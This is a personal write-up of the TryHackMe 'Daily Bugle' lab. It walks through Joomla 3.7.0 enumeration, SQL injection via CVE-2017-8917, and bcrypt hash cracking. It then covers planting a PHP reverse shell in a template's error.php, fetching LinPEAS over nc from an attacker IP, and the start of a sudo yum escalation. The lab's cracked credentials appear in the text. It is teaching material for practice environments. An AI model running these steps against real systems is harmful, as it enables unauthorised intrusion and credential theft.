Daily Bugle (THM)

TryHackMeDaily Bugle Write-Up

topics: web application security, SQL injection, locating/modifying public exploits, cracking hashes, Post-exploitation, Linux privilege escalation

  1. Plan

  2. Enumeration

  3. Local Privilege Escalation (Exploitation)

  4. Root Privilege Escalation

new tools:

tools: nmapAutomator, dirsearch, searchsploit, python, john, kali webshells, ssh, sudo, yum, gtfobins

Plan

We are given a description of the room: "Compromise a Joomla CMS account via SQLi, practise cracking hashes and escalate your privileges by taking advantage of yum." Well we know exactly what to do on this machine.

Enumeration

Initial nmap scan ./nmapAutomator.sh $ip Basic

We have three ports open, 22 (ssh), 80 (http) and 3306 (mySQL) !!!search hacktricks for enum tech!!!. The nmap scan also reveals some potential subdirectories within the webserver.

Versions/Platforms

  • SSH: OpenSSH 7.4

  • HTTP: Apache httpd 2.4.6 (CentOS) PHP/5.640

  • mySQL: MariaDB (unauthorized)

Lets navigate to the website, dirsearch and find a python script to enumerate mySQL (or use mysql tool)

python3 dirsearch.py -u $ip -e php,html,txt

Many subdirectories were found. The ones we have access to include

  • /administrator - login page

  • /bin - nothing there

  • /cache - nothing there

  • /configuration.php - nothing there

  • /htaccess.txt - no critical information

  • /includes - nothing there

  • /robots.txt - lists these directories

  • /templates - nothing

  • /tmp - nothing there

  • /web.config.txt - no critical information

We know the platform being used (per the description and nmap) is Joomla. We need to see if we can find which version it is running to search for relevant exploits.

I attempted to find default creds for the admin login page but a unique password is required on installation.

After having no luck finding the version on the 200 code subdirectories, I decided to google how to find the version in Joomla, leading me to this website

Next suggestion:

The last suggestion is this file in the same directory. dirsearch returned that nothing was left in the /language subdirectory but perhaps it was outside the scope of the default wordlist.

So, we have Joomla version 3.7.0.

./nmapAutomator.sh $ip Vulns also revealed the version and CVE-2017-8917

Local Privilege Escalation

Lets use searchsploit joomla 3.7

SQL Injection

SQLmap (and I believe the mySQL tool) are disallowed on the OSCP exam, so we will have to search for a public script for CVE-2017-8917

Looking up CVE-2017-8917 github leads us to this python Joomblah script

This exploit did not work on Kali 2020 so I used Kali 2018 to run. python joomblah.py http://<victimIP>

Password Cracking

So we found creds, a user jonah with a hashed password of $2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm

hash-identifier was unable to determine the type of hash, lets seek alternative methods. Sometimes the lead characters are an indicator of the type of hash so if we search up $2y$10$ hash

Now (still using Kali 2018) lets store the hash in a file, unzip rockyou and crack the hash with john john --format=bcrypt --wordlist=rockyou.txt hash

Now that we have creds jonah:spiderman123 we can login to the /administrator page . We know that the server is coded in PHP, lets see if we can find a location to upload and run a PHP shell and search Joomla 3.x shells as well.

Initial Shell

The home page for admins

There is a /configuration section and /extensions section, it would be wise to check these places first. The extensions section has an "install" option and there are usually files to edit in configuration settings

There was no area to upload files in the site settings option. Navigating to /templates

It seems like we have found where to upload our PHP shell. This page allows us to edit the files within the site templates, save and execute them upon navigation. It would be unwise to rewrite the entire home page /index.html with our shell. Picking a more discrete file such as /error.php would make more practical sense in terms of evading detection.

Edit Kali's default php reverse shell (/usr/share/webshells/php) to include the attacker IP, replace the entirety of /error.php and save.

Load the page http://<victimIP>/templates/protostar/error.php

Initially I tried to use this Joomla 3.x shell I found. Though I had issues getting it to run properly, it would accept the site and exit without returning anything. Another writeup I found discussed how they used the tokens from the original joomblah script to get it to work. Its worth reading and worth coming back to. Although, there is little advantage using this script as you still need to know the login creds, it does automatically find a file on /templates to rewrite.

SSH

Since there is no tty present currently, we cannot use sudo -l

As we are the user apache, we cannot access the user.txt flag just yet, as it is in /home/jjameson. We know that SSH and mySQL are still open, lets transfer LinPEAS with nc

on Kali:

nc -nlvp 4444 < linpeas.sh

on victim:

cd /tmp
nc <attackerIP> 4444 > linpeas.sh
chmod 777 linpeas.sh
./linpeas.sh >> LIN.txt

We could simply cat LIN.txt but lets look for something more interesting. We know the user is jjameson, lets search for a potential password cat LIN.txt | grep password

Hmm, a password nv5uz9r3ZEDzVjNu is revealed. Lets attempt to SSH into jjameson using this password

It's important to note this password was found in a PHP configuration file.

Root Privilege Escalation

sudo -l

So we have sudo permissions for the yum command. Yum is the standard package manager utility for Red Hat Linux (CentOS, Fedora) distributions. We can also read the /etc/os-release file to confirm this is CentOS running kernel 3.10.0. Perhaps we can find an exploit if this sudo privilege is a rabbit hole.

Lets see if yum is included on GTFObins.

PreviousGamezone (THM)NextInternal (THM)

Last updated